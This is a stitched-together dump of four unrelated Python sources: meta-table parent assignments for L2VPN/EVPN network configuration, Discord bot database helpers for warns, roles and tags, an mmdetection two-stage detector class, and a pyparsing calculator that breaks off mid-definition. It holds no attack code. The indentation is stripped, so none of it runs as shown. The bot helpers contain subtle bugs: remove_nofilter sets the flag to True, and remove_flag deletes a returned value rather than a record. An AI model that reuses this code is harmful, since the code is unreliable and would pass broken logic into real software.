_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.Redundancy']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.AutoDiscovery.BgpSignaling']['meta_info'].parent =_meta_table['L2Vpn.AutoDiscovery']['meta_info']
_meta_table['L2Vpn.Utility.Logging']['meta_info'].parent =_meta_table['L2Vpn.Utility']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibInterface.Format']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib.MibInterface']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibInterface']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib']['meta_info']
_meta_table['L2Vpn.Snmp.Mib']['meta_info'].parent =_meta_table['L2Vpn.Snmp']['meta_info']
_meta_table['L2Vpn.PwRouting']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Neighbor']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Database']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Pbb']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.AutoDiscovery']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Utility']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Snmp']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface.Interfaces.Interface']['meta_info'].parent =_meta_table['GenericInterfaceLists.GenericInterface.Interfaces']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface.Interfaces']['meta_info'].parent =_meta_table['GenericInterfaceLists.GenericInterface']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface']['meta_info'].parent =_meta_table['GenericInterfaceLists']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnTimers']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnLoadBalancing']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables']['meta_info'].parent =_meta_table['Evpn']['meta_info']
|
from . import models
import datetime
from discord import utils, TextChannel
def generate_id():
return utils.time_snowflake(datetime.datetime.now())
async def add_permanent_role(user_id: int, role_id: int):
await add_dbmember_if_not_exist(user_id)
if not await models.PermanentRole.query.where((models.PermanentRole.user_id == user_id) & (
models.PermanentRole.role_id == role_id)).gino.first():
return await models.PermanentRole.create(user_id=user_id, role_id=role_id)
async def remove_permanent_role(user_id: int, role_id: int):
permanent_role = await models.PermanentRole.query.where((models.PermanentRole.user_id == user_id) & (
models.PermanentRole.role_id == role_id)).gino.first()
if permanent_role:
await permanent_role.delete()
return permanent_role
async def get_permanent_roles(user_id: int):
db_member = await get_dbmember(user_id)
if db_member:
return await models.Role.query.where((models.Role.id == models.PermanentRole.role_id) & (models.PermanentRole.user_id == db_member.id)).gino.all()
async def add_staff(user_id: int, position: str):
await add_dbmember_if_not_exist(user_id)
staff = await get_staff(user_id) or await get_helper(user_id)
if staff:
await staff.update(position=position).apply()
else:
await models.Staff.create(id=user_id, position=position)
async def add_helper(user_id: int, position: str, console: str = None):
await add_dbmember_if_not_exist(user_id)
if staff := await get_staff(user_id):
await staff.update(console=console).apply()
else:
await models.Staff.create(id=user_id, position=position, console=console)
async def remove_staff(user_id: int):
staff = await get_staff(user_id)
if staff:
if staff.console:
await staff.update(position="Helper").apply()
else:
await staff.delete()
async def remove_helper(user_id: int):
helper = await get_helper(user_id)
if helper:
if helper.position != "Helper":
await helper.update(console=None).apply()
else:
await helper.delete()
async def get_staff_all():
return await models.Staff.query.where(models.Staff.position != 'Helper').gino.all()
async def get_staff(user_id: int):
return await models.Staff.query.where(
(models.Staff.position != 'Helper') & (models.Staff.id == user_id)).gino.first()
async def get_helpers():
return await models.Staff.query.where(models.Staff.console.isnot(None)).gino.all()
async def get_helper(user_id: int):
return await models.Staff.query.where(models.Staff.id == user_id).gino.first()
async def add_warn(user_id: int, issuer_id: int, reason: str):
await add_dbmember_if_not_exist(user_id)
await add_dbmember_if_not_exist(issuer_id)
await models.Warn.create(id=generate_id(), user=user_id, issuer=issuer_id, reason=reason)
async def copy_warn(user_id: int, warn: models.Warn):
await add_dbmember_if_not_exist(user_id)
warn.id = utils.time_snowflake(utils.snowflake_time(warn.id) + datetime.timedelta(milliseconds=1))
while await get_warn(warn.id):
warn.id = utils.time_snowflake(utils.snowflake_time(warn.id) + datetime.timedelta(milliseconds=1))
warn.user = user_id
await warn.create()
async def get_warn(warn_id: int):
return await models.Warn.get(warn_id)
async def get_warns(user_id: int):
return await models.Warn.query.where(models.Warn.user == user_id).gino.all()
async def remove_warn_id(user_id: int, index: int):
warn = await models.Warn.query.where(models.Warn.user == user_id).offset(index - 1).gino.first()
await warn.delete()
async def remove_warns(user_id: int):
n_warns = await (models.db.select([models.db.func.count()]).where(models.Warn.user == user_id).gino.scalar())
if n_warns:
await models.Warn.delete.where(models.Warn.user == user_id).gino.status()
return n_warns
async def add_timed_restriction(user_id: int, end_date: datetime.datetime, type: str):
await add_dbmember_if_not_exist(user_id)
await models.TimedRestriction.create(id=generate_id(), user=user_id, type=type,
end_date=end_date)
async def get_time_restrictions_by_user(user_id: int):
return await models.TimedRestriction.query.where(models.TimedRestriction.user == user_id).gino.all()
async def get_time_restrictions_by_user_type(user_id: int, type: str):
return await models.TimedRestriction.query.where((models.TimedRestriction.user == user_id) & (
models.TimedRestriction.type == type)).gino.first()
async def get_time_restrictions_by_type(type: str):
return await models.TimedRestriction.query.where(models.TimedRestriction.type == type).gino.all()
async def remove_timed_restriction(user_id: int, type: str):
time_restriction = await get_time_restrictions_by_user_type(user_id, type)
if time_restriction:
await time_restriction.delete()
async def set_time_restriction_alert(user_id: int, type: str):
time_restriction = await get_time_restrictions_by_user_type(user_id, type)
if time_restriction:
await time_restriction.update(alerted=True).apply()
async def add_timed_role(user_id: int, role_id: int, expiring_date: datetime.datetime):
await add_dbmember_if_not_exist(user_id)
entry = await get_time_role_by_user_type(user_id, role_id)
if not entry:
return await models.TimedRole.create(id=generate_id(), user_id=user_id, role_id=role_id, expiring_date=expiring_date)
await entry.update(expiring_date=expiring_date).apply()
return entry
async def remove_timed_role(user_id: int, role_id: int):
timed_role = await get_time_role_by_user_type(user_id, role_id)
if timed_role:
await timed_role.delete()
async def get_time_role_by_user_type(user_id: int, role_id: int):
return await models.TimedRole.query.where(
(models.TimedRole.user_id == user_id) & (models.TimedRole.role_id == role_id)).gino.first()
async def get_timed_roles():
return await models.TimedRole.query.gino.all()
async def add_flag(name: str):
await models.Flag.create(name=name)
async def get_flag(name: str):
if flag := await models.Flag.get(name):
return flag.value
return None
async def remove_flag(name: str):
flag = await get_flag(name)
if flag:
await flag.delete()
async def set_flag(name: str, value: bool):
flag = await get_flag(name)
if flag:
await flag.update(value=value).apply()
async def add_softban(user_id: int, issuer_id: int, reason: str):
await add_dbmember_if_not_exist(user_id)
await models.Softban.create(id=generate_id(), user=user_id, issuer=issuer_id, reason=reason)
async def remove_softban(user_id: int):
softban = await get_softban(user_id)
if softban:
await softban.delete()
async def add_dbmember(user_id: int):
return await models.Member.create(id=user_id)
async def add_dbmember_if_not_exist(user_id: int):
db_member = await get_dbmember(user_id)
if not db_member:
db_member = await add_dbmember(user_id)
return db_member
async def get_dbmember(user_id: int):
return await models.Member.get(user_id)
async def add_dbchannel(channel_id: int, name: str):
return await models.Channel.create(id=channel_id, name=name)
async def get_dbchannel(channel_id: int):
return await models.Channel.get(channel_id)
async def add_dbrole(role_id: int, name: str):
return await models.Role.create(id=role_id, name=name)
async def get_dbrole(role_id: int):
return await models.Role.get(role_id)
async def get_softban(user_id: int):
return await models.Softban.query.where(models.Softban.user == user_id).gino.first()
async def add_watch(user_id: int):
db_member = await add_dbmember_if_not_exist(user_id)
await db_member.update(watched=True).apply()
async def remove_watch(user_id: int):
db_member = await get_dbmember(user_id)
if db_member:
await db_member.update(watched=False).apply()
async def is_watched(user_id: int):
db_member = await get_dbmember(user_id)
return db_member.watched if db_member else False
async def add_nofilter(channel: TextChannel):
db_channel = await get_dbchannel(channel.id)
if not db_channel:
db_channel = await add_dbchannel(channel.id, channel.name)
await db_channel.update(nofilter=True).apply()
async def remove_nofilter(channel: TextChannel):
db_channel = await get_dbchannel(channel.id)
if db_channel:
await db_channel.update(nofilter=True).apply()
async def check_nofilter(channel: TextChannel):
channel = await models.Channel.get(channel.id)
return channel.nofilter if channel else False
async def add_friendcode_3ds(user_id: int, fc: int):
await add_dbmember_if_not_exist(user_id)
if fcs := await get_friendcode(user_id):
await fcs.update(fc_3ds=fc).apply()
return
await models.FriendCode.create(id=user_id, fc_3ds=fc)
async def add_friendcode_switch(user_id: int, fc: int):
await add_dbmember_if_not_exist(user_id)
if fcs := await get_friendcode(user_id):
await fcs.update(fc_switch=fc).apply()
return
await models.FriendCode.create(id=user_id, fc_switch=fc)
async def get_friendcode(user_id: int):
return await models.FriendCode.get(user_id)
async def delete_friendcode_3ds(user_id: int):
friendcodes = await get_friendcode(user_id)
if friendcodes:
await friendcodes.update(fc_3ds=None).apply()
if friendcodes.fc_3ds is None and friendcodes.fc_switch is None:
await friendcodes.delete()
async def delete_friendcode_switch(user_id: int):
friendcodes = await get_friendcode(user_id)
if friendcodes:
await friendcodes.update(fc_switch=None).apply()
if friendcodes.fc_3ds is None and friendcodes.fc_switch is None:
await friendcodes.delete()
async def add_rule(number: int, description: str):
rule = await get_rule(number)
if not rule:
await models.Rule.create(id=number, description=description)
async def edit_rule(number: int, description: str):
rule = await get_rule(number)
if rule:
await rule.update(description=description).apply()
async def delete_rule(number: int):
rule = await get_rule(number)
if rule:
await rule.delete()
async def get_rules():
return await models.Rule.query.order_by(models.Rule.id).gino.all()
async def get_rule(number: int):
return await models.Rule.get(number)
async def add_reminder(date: datetime.datetime, author: int, reminder: str):
await add_dbmember_if_not_exist(author)
await models.RemindMeEntry.create(id=generate_id(), date=date, author=author, reminder=reminder)
async def get_reminders() -> list[models.RemindMeEntry]:
return await models.RemindMeEntry.query.order_by(models.RemindMeEntry.date).gino.all()
async def remove_reminder(reminder_id: int):
db_reminder = await models.RemindMeEntry.get(reminder_id)
await db_reminder.delete()
async def create_tag(title: str, content: str, author: int):
await add_dbmember_if_not_exist(author)
await models.Tag.create(id=generate_id(), title=title, content=content, author=author)
async def get_tag(title: str) -> models.Tag:
return await models.Tag.query.where(models.Tag.title == title).gino.first()
async def get_tags() -> list[models.Tag]:
return await models.Tag.query.order_by(models.Tag.id).gino.all()
async def search_tags(query: str) -> list[models.Tag]:
return await models.Tag.query.where(models.Tag.title.ilike(f"%{query}%")).limit(10).gino.all()
async def delete_tag(title: str):
db_tag = await get_tag(title)
await db_tag.delete()
|
import torch
import torch.nn as nn
from .base import BaseDetector
from .test_mixins import RPNTestMixin, BBoxTestMixin, MaskTestMixin
from .. import builder
from ..registry import DETECTORS
from mmdet.core import bbox2roi, bbox2result, build_assigner, build_sampler
@DETECTORS.register_module
class TwoStageDetector(BaseDetector, RPNTestMixin, BBoxTestMixin,
MaskTestMixin):
def __init__(self,
backbone,
neck=None,
shared_head=None,
rpn_head=None,
bbox_roi_extractor=None,
bbox_head=None,
mask_roi_extractor=None,
mask_head=None,
train_cfg=None,
test_cfg=None,
pretrained=None):
super(TwoStageDetector, self).__init__()
self.backbone = builder.build_backbone(backbone)
if neck is not None:
self.neck = builder.build_neck(neck)
if shared_head is not None:
self.shared_head = builder.build_shared_head(shared_head)
if rpn_head is not None:
self.rpn_head = builder.build_head(rpn_head)
if bbox_head is not None:
self.bbox_roi_extractor = builder.build_roi_extractor(
bbox_roi_extractor)
self.bbox_head = builder.build_head(bbox_head)
if mask_head is not None:
if mask_roi_extractor is not None:
self.mask_roi_extractor = builder.build_roi_extractor(
mask_roi_extractor)
self.share_roi_extractor = False
else:
self.share_roi_extractor = True
self.mask_roi_extractor = self.bbox_roi_extractor
self.mask_head = builder.build_head(mask_head)
self.train_cfg = train_cfg
self.test_cfg = test_cfg
self.init_weights(pretrained=pretrained)
@property
def with_rpn(self):
return hasattr(self, 'rpn_head') and self.rpn_head is not None
def init_weights(self, pretrained=None):
super(TwoStageDetector, self).init_weights(pretrained)
self.backbone.init_weights(pretrained=pretrained)
if self.with_neck:
if isinstance(self.neck, nn.Sequential):
for m in self.neck:
m.init_weights()
else:
self.neck.init_weights()
if self.with_shared_head:
self.shared_head.init_weights(pretrained=pretrained)
if self.with_rpn:
self.rpn_head.init_weights()
if self.with_bbox:
self.bbox_roi_extractor.init_weights()
self.bbox_head.init_weights()
if self.with_mask:
self.mask_head.init_weights()
if not self.share_roi_extractor:
self.mask_roi_extractor.init_weights()
def extract_feat(self, img):
x = self.backbone(img)
if self.with_neck:
x = self.neck(x)
return x
def forward_train(self,
img,
img_meta,
gt_bboxes,
gt_labels,
gt_bboxes_ignore=None,
gt_masks=None,
proposals=None):
x = self.extract_feat(img)
losses = dict()
# RPN forward and loss
if self.with_rpn:
rpn_outs = self.rpn_head(x)
rpn_loss_inputs = rpn_outs + (gt_bboxes, img_meta,
self.train_cfg.rpn)
rpn_losses = self.rpn_head.loss(
*rpn_loss_inputs, gt_bboxes_ignore=gt_bboxes_ignore)
losses.update(rpn_losses)
proposal_cfg = self.train_cfg.get('rpn_proposal',
self.test_cfg.rpn)
proposal_inputs = rpn_outs + (img_meta, proposal_cfg)
proposal_list = self.rpn_head.get_bboxes(*proposal_inputs)
else:
proposal_list = proposals
# assign gts and sample proposals
if self.with_bbox or self.with_mask:
bbox_assigner = build_assigner(self.train_cfg.rcnn.assigner)
bbox_sampler = build_sampler(
self.train_cfg.rcnn.sampler, context=self)
num_imgs = img.size(0)
if gt_bboxes_ignore is None:
gt_bboxes_ignore = [None for _ in range(num_imgs)]
sampling_results = []
for i in range(num_imgs):
assign_result = bbox_assigner.assign(proposal_list[i],
gt_bboxes[i],
gt_bboxes_ignore[i],
gt_labels[i])
sampling_result = bbox_sampler.sample(
assign_result,
proposal_list[i],
gt_bboxes[i],
gt_labels[i],
feats=[lvl_feat[i][None] for lvl_feat in x])
sampling_results.append(sampling_result)
# bbox head forward and loss
if self.with_bbox:
rois = bbox2roi([res.bboxes for res in sampling_results])
# TODO: a more flexible way to decide which feature maps to use
bbox_feats = self.bbox_roi_extractor(
x[:self.bbox_roi_extractor.num_inputs], rois)
if self.with_shared_head:
bbox_feats = self.shared_head(bbox_feats)
cls_score, bbox_pred = self.bbox_head(bbox_feats)
bbox_targets = self.bbox_head.get_target(sampling_results,
gt_bboxes, gt_labels,
self.train_cfg.rcnn)
loss_bbox = self.bbox_head.loss(cls_score, bbox_pred,
*bbox_targets)
losses.update(loss_bbox)
# mask head forward and loss
if self.with_mask:
if not self.share_roi_extractor:
pos_rois = bbox2roi(
[res.pos_bboxes for res in sampling_results])
mask_feats = self.mask_roi_extractor(
x[:self.mask_roi_extractor.num_inputs], pos_rois)
if self.with_shared_head:
mask_feats = self.shared_head(mask_feats)
else:
pos_inds = []
device = bbox_feats.device
for res in sampling_results:
pos_inds.append(
torch.ones(
res.pos_bboxes.shape[0],
device=device,
dtype=torch.uint8))
pos_inds.append(
torch.zeros(
res.neg_bboxes.shape[0],
device=device,
dtype=torch.uint8))
pos_inds = torch.cat(pos_inds)
mask_feats = bbox_feats[pos_inds]
mask_pred = self.mask_head(mask_feats)
mask_targets = self.mask_head.get_target(sampling_results,
gt_masks,
self.train_cfg.rcnn)
pos_labels = torch.cat(
[res.pos_gt_labels for res in sampling_results])
loss_mask = self.mask_head.loss(mask_pred, mask_targets,
pos_labels)
losses.update(loss_mask)
return losses
def simple_test(self, img, img_meta, proposals=None, rescale=False):
"""Test without augmentation."""
assert self.with_bbox, "Bbox head must be implemented."
x = self.extract_feat(img)
proposal_list = self.simple_test_rpn(
x, img_meta, self.test_cfg.rpn) if proposals is None else proposals
det_bboxes, det_labels = self.simple_test_bboxes(
x, img_meta, proposal_list, self.test_cfg.rcnn, rescale=rescale)
bbox_results = bbox2result(det_bboxes, det_labels,
self.bbox_head.num_classes)
if not self.with_mask:
return bbox_results
else:
segm_results = self.simple_test_mask(
x, img_meta, det_bboxes, det_labels, rescale=rescale)
return bbox_results, segm_results
def aug_test(self, imgs, img_metas, rescale=False):
"""Test with augmentations.
If rescale is False, then returned bboxes and masks will fit the scale
of imgs[0].
"""
# recompute feats to save memory
proposal_list = self.aug_test_rpn(
self.extract_feats(imgs), img_metas, self.test_cfg.rpn)
det_bboxes, det_labels = self.aug_test_bboxes(
self.extract_feats(imgs), img_metas, proposal_list,
self.test_cfg.rcnn)
if rescale:
_det_bboxes = det_bboxes
else:
_det_bboxes = det_bboxes.clone()
_det_bboxes[:, :4] *= img_metas[0][0]['scale_factor']
bbox_results = bbox2result(_det_bboxes, det_labels,
self.bbox_head.num_classes)
# det_bboxes always keep the original scale
if self.with_mask:
segm_results = self.aug_test_mask(
self.extract_feats(imgs), img_metas, det_bboxes, det_labels)
return bbox_results, segm_results
else:
return bbox_results
|
from __future__ import division
import discord, math, operator
from discord.ext import commands
from pyparsing import (Literal,CaselessLiteral,Word,Combine,Group,Optional,
ZeroOrMore,Forward,nums,alphas,oneOf)
__author__='Paul McGuire'
__version__ = '$Revision: 0.0 $'
__date__ = '$Date: 2009-03-20 $'
__source__ = """http://pyparsing.wikispaces.com/file/view/fourFn.py
http://pyparsing.wikispaces.com/message/view/home/15549426
"""
__note__ = """
This is a re-wrap of Paul McGuire's fourFn.py as a class, so it can
be used easily in other places of the code. Most of the work wad done
by corpnewt, all I did was clean it and create the results in embeds.
Also, the messages are deleted after, except for the correct answer.
"""
class NumericStringParserForPython3(object):
"""
Most of this code comes from the fourFn.py pyparsing example
"""
def pushFirst(self, strg, loc, toks):
self.exprStack.append(toks[0])
def pushUMinus(self, strg, loc, toks):
if toks and toks[0]=='-':
self.exprStack.append('unary -')
def __init__(self):
"""
Please use any of the following symbols:
expop :: '^'
multop :: '*' | '/'
addop :: '+' | '-'
integer :: ['+' | '-'] '0'..'9'+
"""
point = Literal(".")
e = CaselessLiteral("E")
fnumber = Combine(Word("+-"+nums, nums) +
Optional(point + Optional(Word(nums))) +
Optional(e + Word("+-"+nums, nums)))
ident = Word(alphas, alphas+nums+"_$")
plus = Literal("+")
minus = Literal("-")
mult = Literal("*")
div = Literal("/")
lpar = Literal("(").suppress()
rpar = Literal(")").suppress()
addop = plus | minus
multop = mult | div
expop = Literal("^")
pi = CaselessLiteral("PI")
expr = Forward()
atom = ((Optional(oneOf("- +")) +
(pi|e|fnumber|ident+lpar+expr+rpar).setParseAction(self.pushFirst))
| Optional(oneOf("- +")) + Group(lpar+expr+rpar)
).setParseAction(self.pushUMinus)
# by defining exponentiation as "atom [ ^ factor ]..." instead of
# "atom [ ^ atom ]...", we get right-to-left exponents, instead of left-to-right
# that is, 2^3^2 = 2^(3^2), not (2^3)^2.
factor = Forward()
factor << atom + ZeroOrMore((expop + factor).setParseAction(self.pushFirst))
term = factor + ZeroOrMore((multop + factor).setParseAction(self.pushFirst))
expr << term + ZeroOrMore((addop + term).setParseAction(self.pushFirst))
# addop_term = (addop + term).setParseAction(self.pushFirst)
# general_term = term + ZeroOrMore(addop_term) | OneOrMore(addop_term)
# expr << general_term
self.bnf = expr
# this will map operator symbols to their corresponding arithmetic operations
epsilon = 1e-12
self.opn = {
"+" : operator.add,
"-" : operator.sub,
"*" : operator.mul,
"/" : operator.truediv,
"^" : operator.pow }
self.fn = {
